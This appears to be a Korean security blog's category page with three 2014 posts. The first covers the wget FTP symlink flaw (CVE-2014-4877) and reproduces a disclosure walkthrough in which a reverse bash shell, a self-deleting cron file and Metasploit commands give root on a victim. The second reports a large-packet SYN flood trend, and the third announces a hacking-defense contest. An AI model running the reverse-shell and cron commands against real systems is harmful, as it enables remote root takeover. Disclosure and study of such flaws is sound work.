'모의해킹 (WAPT)'에 해당되는 글 160건

  1. 2014.10.31 Wget FTP Symlink Attack Vulnerability
  2. 2014.10.28 새로운 형태의 디도스 공격 발견
  3. 2014.09.30 제11회 해킹방어대회 개최
2014.10.31 18:03

Wget FTP Symlink Attack Vulnerability

http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html


[Bug-wget] GNU wget 1.16 released

It is available for download here:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz

and the GPG detached signatures using the key E163E1EA:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz.sig
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz.sig

To reduce load on the main server, you can use this redirector service
which automatically redirects you to a mirror:

http://ftpmirror.gnu.org/wget/wget-1.16.tar.gz
http://ftpmirror.gnu.org/wget/wget-1.16.tar.xz

* Noteworthy changes in Wget 1.16

** No longer create local symbolic links by default.  Closes CVE-2014-4877.

** Use libpsl for verifying cookie domains.

** Default progress bar output changed.

** Introduce --show-progress to force display the progress bar.

** Introduce --no-config.  The wgetrc files will not be read.

** Introduce --start-pos to allow starting downloads from a specified position.

** Fix a problem with ISA Server Proxy and keep-alive connections.


"In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"



Exploitation

 

We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.

 

msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R

0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112

 

Next we create a crontab file that runs once a minute, launches this command, and deletes itself:

 

cat>cronshell <<EOD

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell

EOD

 

Now we start up msfconsole and configure a shell listener:

 

msfconsole

msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash

msf exploit(handler) > set LHOST 192.168.0.4

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > run -j

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.4:4444

 

Finally we switch to the wget module itself:

 

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write

msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell

msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell

msf auxiliary(wget_symlink_file_write) > set SRVPORT 21

msf auxiliary(wget_symlink_file_write) > run

[+] Targets should run: $ wget -m ftp://192.168.0.4:21/

[*] Server started.

 

At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/

 

[*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'...

[*] 192.168.0.2:52251 -> LIST -a

[*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa

[*] 192.168.0.2:52251 -> LIST -a

[*] 192.168.0.2:52251 -> RETR cronshell

[+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell

[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500

 

 

msf auxiliary(wget_symlink_file_write) > sessions -i 1

[*] Starting interaction with 1...

 

id

uid=0(root) gid=0(root) groups=0(root),1001(rvm)


Trackback 0 Comment 0
2014.10.28 22:33

새로운 형태의 디도스 공격 발견

‘Tsunami SYN Flood Attack’ 패킷당 1000bytes의 트래픽 유발

일반적인 SYN 패킷 25배 크기로 패킷 데이터양 추가해 공격

http://www.boannews.com/media/view.asp?idx=43654&skind=O


      ▲공격대상별 공격비율

Tsunami SYN-Flood Attack은 주로 ISP나 게임 회사의 데이터센터를 공격했으며 4~5Gbps의 공격이 발생했다. 기존 SYN flood Attack은 패킷당 40~60bytes의 트래픽을 유발하는데 반해 Tsunami SYN-Flood Attack은 패킷당 1000bytes의 트래픽을 유발한다.

[출처]

1. http://itsecuritynews.info/2014/10/12/tsunami-syn-flood-ddos-attack-a-dangerous-trend/

2. http://securityaffairs.co/wordpress/29141/cyber-crime/tsunami-syn-flood-ddos.html

3. http://blog.radware.com/security/2014/10/tsunami-syn-flood-attack/


[용어정리]

·ISP(Internet Service Provider) : 개인이나 기업에 인터넷 접속 서비스, 웹 사이트 구축 등을 제공하는 회사

·TCP 3way handshake : TCP/IP프로토콜을 이용해서 통신을 하는 응용프로그램이 데이터를 전송하기 전에 먼저 정확한 전송을 보장하기 위해 상대방 컴퓨터와 사전에 세션을 수립하는 과정

·봇넷(Botnet) : 스팸메일이나 악성코드 등을 전파하도록 하는 악성코드 봇(Bot)에 감염되어 해커가 마음대로 제어할 수 있는 좀비PC들로 구성된 네트워크



출처 : 보안뉴스


Trackback 0 Comment 0
2014.09.30 18:29

제11회 해킹방어대회 개최

한국인터넷진흥원에서는 해킹사고에 대한 대응능력 향상을 위해 다음과 같이 「제11회 해킹방어대회」를 개최합니다.


 

□ 참가대상 및 방법

 

  o 참가대상 : 국내 모든 정보보호 담당자, 화이트해커(1개 팀당 4명 이하로 팀원 구성, 내국인으로 제한)

 

  o 참가신청 : 2014. 10. 1(수) 09:00 ~ 2014. 10. 15(수) 18:00까지 홈페이지를 통해 신청(http://hdcon.kisa.or.kr)

 

  o 기타 문의처 : hdcon@kisa.or.kr


 

□ 대회 내용

 

  o 개요

    - 주최 : 미래창조과학부

    - 주관 : 한국인터넷진흥원

    - 협찬 : Microsoft, Symantec, CDNetworks

 

  o 예선 대회

    - 1부 : 2014. 10. 18(토) 10:00 ~ 18:00 (8시간), 온라인 문제풀이

    - 2부 : 2014. 10. 19(일) 10:00 ~ 20:00 (10시간), 온라인 실전 시뮬레이션(실시간 사고대응)

    - 1부 예선결과 상위 100개팀이 2부 예선에 진출하여 본선진출 10개팀 선정

 

  o 본선 대회

    - 2014. 12. 4(목) 09:00 - 18:30 파티오나인 그레이스홀

    - 가상망 내에서 발생하는 사고에 대한 실시간 사고대응. 취약점 대응, 침해시스템 분석, 시스템 가동율 유지 등 종합적으로 평가하여 순위 결정

 

  o 참여 행사

    - 일반인들을 대상으로 해킹/방어기술 실습, 우승팀 맞추기, 응원메시지 남기기, 퀴즈 이벤트 등을 온라인으로 진행

    - 실시간 페이스북(https://www.facebook.com/hdcon), 트위터(@kisa_hdcon) 중계


 

□ 시상 내용

 

  o 대상(미래창조과학부장관상) : 상금 1,000만원 및 상장(1팀)

  o 금상(한국인터넷진흥원장상) : 상금 400만원 및 상장(2팀)

  o 은상(한국인터넷진흥원장상) : 상금 200만원 및 상장(2팀)


Trackback 0 Comment 0